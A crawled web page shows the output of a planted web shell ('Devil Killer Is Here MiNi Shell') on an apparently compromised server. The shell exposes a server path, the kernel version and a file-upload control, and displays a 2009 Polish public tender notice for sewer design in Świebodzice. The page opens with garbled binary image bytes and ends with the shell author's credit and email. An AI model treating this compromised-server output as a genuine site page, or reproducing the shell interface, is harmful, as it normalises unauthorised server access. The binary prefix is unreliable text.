JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090127/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090127/9742-N-2009.html

<p class="kh_header"><b>Świebodzice: Wykonanie dokumentacji budowlano - wykonawczej i kosztorysowej wraz ze specyfikacją techniczną wykonania i odbioru robót oraz pozwoleniem na budowę dla zadania pn. Kanalizacja miasta Świebodzice - uporządkowanie gospodarki wodno ściekowej gmin WZWiK - II etap</b><br>
<b>Numer ogłoszenia: 9742 - 2009; data zamieszczenia: 27.01.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Świebodzice , ul. Rynek 1, 58-160 Świebodzice, woj. dolnośląskie, tel. 074 6669543, faks 074 6669509.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.swiebodzice.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie dokumentacji budowlano - wykonawczej i kosztorysowej wraz ze specyfikacją techniczną wykonania i odbioru robót oraz pozwoleniem na budowę dla zadania pn. Kanalizacja miasta Świebodzice - uporządkowanie gospodarki wodno ściekowej gmin WZWiK - II etap.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1).Odcinek I - Ul. Jeleniogórska w Świebodzicach (długości około 0,52km),
2).Odcinek II - Ul. Sikorskiego (długości około 0,78km),
3).Odcinek III - Ul. Ofiar Oświęcimskich (długości około 0,93km),
4).Odcinek IV - Ul. Łączna (długości około 1,05km),
5).Odcinek V - Renowacja istniejących kanałów deszczowych w ul. Jeleniogórskiej (długości około 1,10km). Wykonanie dokumentacji na renowację powinno być poprzedzone inspekcją aktualnego stanu technicznego (inspekcja kamerą telewizyjną).
Dokumentacja na renowacje musi obejmować zaprojektowanie brakujących  fragmentów kanałów do granic nieruchomości umożliwiających przyłączenie przykanalików.

Kod CPV : 71 320000-7 - usługi w zakresie projektowania inżynieryjnego 

3.1. Zakres opracowania obejmuje:

 1) pozyskanie aktualnych podkładów geodezyjnych niezbędnych do opracowania dokumentacji i uzyskania pozwolenia na budowę,
  2) sporządzenie projektów budowlanych, wraz z niezbędnymi opiniami i uzgodnieniami umożliwiającymi uzyskanie pozwolenia na budowę, projekty budowlane należy wykonać w ilości 6 egz. w formie pisemnej oraz 1 egz. w formie elektronicznej w formacie PDF. Zgodnie z rozporządzeniem Ministra Infrastruktury z dnia 3 lipca 2003 ( Dz. U. Nr 120 poz. 1133 z 2003 i Dz. U. Nr 201 poz. 1239 z 2008 r.)
  3) sporządzenie projektów wykonawczych uzupełniających i uszczegóławiających projekty budowlane w zakresie i stopniu dokładności niezbędnym do sporządzenia przedmiaru robót, kosztorysu inwestorskiego i realizacji robót, projekty wykonawcze należy wykonać w ilości 6 egz. w formie pisemnej oraz 1 egz. w formie elektronicznej PDF. Zgodnie z rozporządzeniem Ministra Infrastruktury (Dz. U. Nr 202 poz. 2072 z 2004 r. z późn. zmianami)
 4) sporządzenie projektów wykonawczych na odbudowę nawierzchni drogowych po wykonaniu kanalizacji, projekty wykonawcze należy wykonać w ilości 6 egz. w formie pisemnej oraz 1 egz. w formie elektronicznej w formacie PDF. Zgodnie z rozporządzeniem Ministra Infrastruktury (Dz. U. Nr 202 poz. 2072 z 2004 r. z późn. zmianami)
 5) sporządzenie projektu wykonawczego na organizację ruchu zastępczego na czas prowadzenia robót, projekty wykonawcze należy wykonać w ilości 6 egz. w formie pisemnej oraz 1 egz. w formie elektronicznej w formacie PDF
  6) sporządzenie specyfikacji technicznej wykonania i odbioru robót budowlanych - w ilości 3 egzemplarzy w formie pisemnej oraz 1 egz. w formie elektronicznej w formacie PDF. Zgodnie z rozporządzeniem Ministra Infrastruktury ( Dz. U. Nr 202 poz. 2072 z 2004 r. z późn zmianami)
  7) sporządzenie przedmiarów robót - w ilości 6 egzemplarzy w formie pisemnej oraz 1 egz. w formie elektronicznej w formacie PDF. Zgodnie z rozporządzeniem Ministra Infrastruktury ( Dz. U. Nr 130 poz. 1389 z 2004 r.)
  8) sporządzenie kosztorysów inwestorskich - w ilości 2 egzemplarzy w formie pisemnej. Zgodnie z rozporządzeniem Ministra Infrastruktury ( Dz. U. Nr 130 poz. 1389 z 2004 r.)
  9) sporządzenie informacji dotyczącej bezpieczeństwa i ochrony zdrowia /BIOZ/ - w ilości    3 egzemplarzy w formie pisemnej oraz 1 egz. w formie elektronicznej w formacie PDF
  10) sporządzenie zbiorczego zestawienia kosztów - w ilości 2 egz. w formie pisemnej.

3.2. Zakres opracowania obejmujący odcinek I, odcinek II, odcinek III, odcinek IV musi obejmować fragmenty kanałów do granicy nieruchomości umożliwiających podłączenie przyłączy kanalizacyjnych.

3.3. Zakres opracowania obejmujący odcinek V musi obejmować  wykonanie dokumentacji na renowację , które powinno być poprzedzone inspekcją aktualnego stanu technicznego (inspekcja kamerą telewizyjną).
Dokumentacja na renowację musi obejmować zaprojektowanie brakujących  fragmentów kanałów do granic nieruchomości umożliwiających podłączenie  przykanalików.

3.4. Opracowany kosztorys inwestorski i przedmiar robót musi zawierać czytelnie wyodrębnione części  odpowiednio dla odcinka I, odcinka II, odcinka III, odcinka IV i odcinka V.

ZALECA SIĘ ZAINTERESOWANYM WYKONAWCOM DOKONANIE WIZJI LOKALNEJ TERENÓW OBJĘTYCH ZAKRESAMI OPRACOWAŃ..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 71.32.00.00-7.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
<p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 5. Warunki udziału w postępowaniu i opis sposobu oceny ich spełnienia:
O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają niżej podane warunki:

5.1 Nie podlegają wykluczeniu na podstawie art. 24 ustawy Prawo zamówień publicznych.

5.2. Posiadają niezbędną wiedzę i doświadczenie oraz uprawnienia  w       następujących specjalnościach: 
1.Instalacyjna  w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych
2.Drogowej

5.3. Posiadają sytuację ekonomiczno-finansową zapewniającą wykonanie zamówienia.
W/w warunki zostaną uznane za spełnione, jeżeli Wykonawca złoży kompletne dokumenty, o których mowa w punkcie 6 niniejszej specyfikacji.

6.Oświadczenia i dokumenty, jakie muszą dostarczyć Wykonawcy w celu          potwierdzenia spełniania warunków udziału w postępowaniu:

6.1.Dokumentami potwierdzającymi spełnianie warunku, o którym mowa w punkcie   5.1. niniejszej specyfikacji muszą być:                                    

a) Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do  rejestru lub zgłoszenia do ewidencji działalności gospodarczej - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu  składania ofert.

b) Aktualne zaświadczenia właściwego naczelnika Urzędu Skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające odpowiednio, że Wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne i społeczne, lub zaświadczenia, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu  składania ofert.
c) Aktualna informacja z Krajowego Rejestru Karnego w zakresie określonym  w art.24 ust.1pkt. 4-8 ustawy Prawo zamówień publicznych wystawionej nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.

d) Złożona zgodna z załączonym wzorem oferta zał. Nr 1 do niniejszej SIWZ i podpisana przez uprawnionych do składania oświadczeń woli w imieniu Wykonawcy .

6.2. Dokumentami potwierdzającymi spełnianie warunku udziału w postępowaniu  o którym mowa w punkcie 5.2. niniejszej  specyfikacji muszą być: 

a) Wykaz osób -zał. Nr 2 do SIWZ  które będą uczestniczyć  w wykonywaniu zamówienia oraz posiadane uprawnienia w specjalnościach wymienionych w punkcie 5.2. wraz z potwierdzoną kopią posiadanych uprawnień dla w/w osób, określonych przepisami Prawa budowlanego - zał. Nr 2 do SIWZ .

b) Zaświadczenie z właściwej Izby Samorządu Zawodowego dla w/w osób, potwierdzające ich przynależność do Izby oraz posiadanie wymaganego ubezpieczenia od odpowiedzialności cywilnej, aktualnego na dzień składania ofert. Zamawiający dopuszcza, jako dokument równoważny, złożenie nieaktualnego zaświadczenia z w/w Izby oraz dowodu dokonania należnych składek, z którego wynika, że są one opłacone na dzień składania ofert.

c) Wykaz podwykonawców-firm, podmiotów -zał. Nr 3 do SIWZ które będą uczestniczyć w wykonywaniu zamówienia oraz posiadane uprawnienia w specjalnościach  wymienionych w punkcie 5.2. wraz z potwierdzoną kopią posiadanych uprawnień dla w/w osób, określonych przepisami prawa budowlanego - zał. Nr 2 do SIWZ.

d) Wykaz zrealizowanych zamówień - zał. Nr 4 do SIWZ wykonanych dokumentacji projektowych w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia, odpowiadających rodzajowi opracowania będącym przedmiotem niniejszego zamówienia (min. dwa zadania) o cenach brutto  każde nie mniejszej od  ceny brutto składanej oferty.
 e) Dokumenty potwierdzające , że zamówienia wymienione w wykazie zostały wykonane należycie np. referencje , świadectwa

6.3. Dokumentami potwierdzającymi spełnianie warunku udziału w postępowaniu o którym mowa w punkcie 5.3. niniejszej  specyfikacji muszą być: 

a) Złożona zgodna z załączonym wzorem oferta zał. Nr 1 do niniejszej SIWZ i podpisana przez uprawnionych do składania oświadczeń woli w imieniu Wykonawcy 

b) Dokument potwierdzający ubezpieczenie Wykonawcy od odpowiedzialności cywilnej w zakresie prowadzonej działalności..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Zbiorcze zestawienie - wszystkich wymaganych przez Zamawiającego dokumentów

l.p.	Nazwa (rodzaj) dokumentu
1	Formularz oferty - załącznik nr 1 do SIWZ

2	Aktualny odpis z właściwego rejestru albo aktualnego zaświadczenia o wpisie do ewidencji 
działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenie do ewidencji 
działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert
3	Aktualne zaświadczenie właściwego naczelnika urzędu skarbowego oraz właściwego oddziału 
Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego 
potwierdzających odpowiednio, że dostawca lub wykonawca nie zalega z opłacaniem podatków, 
opłat oraz składek na ubezpieczenie zdrowotne i społeczne, lub zaświadczeń, że uzyskał przewidziane 
prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności, lub wstrzymanie w całości
 wykonania decyzji właściwego organu - wystawionych nie wcześniej niż 3 miesiące przed upływem 
terminu składania ofert
4	Aktualna informacja z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4 - 8 ustawy, wystawiona nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert 
(członkowie zarządu, prokurenci lub właściciele w przypadku podmiotów prowadzących działalność 
gospodarczą na podstawie wpisu do ewidencji działalności gospodarczej)
5	Wykaz zrealizowanych zamówień - zał. Nr 4 do SIWZ wykonanych dokumentacji projektowych 
w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia, odpowiadających 
rodzajowi opracowania będącym przedmiotem niniejszego zamówienia (minimum  dwa zadania)
o cenach brutto  każde niemniejszej od  ceny brutto składanej oferty.
6	Wykaz osób i dokumenty stwierdzające, że osoby, które będą wykonywać zamówienie, posiadają 
wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień 
zgodnie z p 6.2 pp. a i b SIWZ- Zał. nr. 2 do SIWZ
7	Wykaz podwykonawców, firm , podmiotów -zał. Nr 3 do SIWZ które będą uczestniczyć w wykonywaniu zamówienia wraz z zakresem wykonywanych  robót.
8	Polisa a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest 
ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności.
9	Umowa regulująca współpracę podmiotów występujących wspólnie oraz pełnomocnictwo
 dla reprezentanta z określeniem zakresu pełnomocnictwa oraz oświadczenia każdego ze wspólników , że spełnia warunki udziału w postępowaniu określone w art. 22 ust.1 p.1 - 3 i nie podlega wykluczeniu  na podstawie art. 24  ustawy  Prawo zamówień publicznych- jeżeli taka sytuacja występuje
10	Podpisany na każdej stronie wzór umowy - załącznik nr 5 do SIWZ

6.5. Wszystkie w/w dokumenty winny być przedstawione w formie oryginału lub kserokopii poświadczonej za zgodność z oryginałem przez  uprawnionych do składania oświadczeń woli w imieniu Wykonawcy.

6.6. Upoważnienie osób podpisujących ofertę do jej podpisania musi bezpośrednio wynikać z dokumentów dołączonych do oferty. Oznacza to, że jeżeli upoważnienie takie nie wynika wprost z dokumentu stwierdzającego status prawny Wykonawcy (odpisu z właściwego rejestru lub zaświadczenia o wpisie do ewidencji działalności gospodarczej), to do oferty należy dołączyć stosowne pełnomocnictwo. 

6.7.Dokumenty sporządzone w języku obcym muszą być złożone wraz z tłumaczeniem na język polski, poświadczonym przez Wykonawcę.

6.8. W przypadku składania oferty wspólnej przez kilku przedsiębiorców, każdy ze wspólników musi złożyć dokumenty wymienione w tabeli p.2, 3 , 4  a pozostałe dokumenty będą traktowane jako wspólne. Wspólnicy muszą ustanowić pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo do reprezentowania w postępowaniu i zawarcia umowy. Do oferty należy dołączyć stosowne pełnomocnictwo, podpisane przez osoby upoważnione do składania oświadczeń woli każdego ze wspólników oraz oświadczenia każdego ze wspólników, że spełnia warunki udziału w postępowaniu określone w art. 22 ust.1 p.1 - 3 i nie podlega wykluczeniu  na podstawie art. 24  ustawy  Prawo zamówień publicznych.
Wspólnicy ponoszą solidarną odpowiedzialność za niewykonanie lub nienależyte wykonanie zamówienia, określoną w art. 366 Kodeksu cywilnego. 
          
      6.9. Wykonawca z siedzibą poza terytorium Polski
                                                                          
a). zamiast dokumentów, o których mowa w punktach 3, 4,  tabeli składa dokument lub dokumenty wystawione w kraju, w którym ma siedzibę, lub miejsce zamieszkania, potwierdzające odpowiednio, że:
- nie otwarto jego likwidacji ani nie ogłoszono upadłości,
- nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne, albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu,
- nie orzeczono wobec niego zakazu ubiegania się o zamówienie.
b). zamiast dokumentów, o których mowa w punkcie 5 tabeli składa zaświadczenie właściwego organu sądowego lub administracyjnego kraju pochodzenia albo zamieszkania osoby, której dokumenty dotyczą w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy
Jeżeli w kraju pochodzenia osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w punktach 3,4,5, tabeli, zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania.</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.swiebodzice.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> URZĄD MIASTA 
RYNEK 1
58-160 ŚWIEBODZICE.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 06.02.2009 godzina 10:00, miejsce: URZĄD MIASTA 
RYNEK 1
58-160 ŚWIEBODZICE
 (sekretariat pok. Nr 10).</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com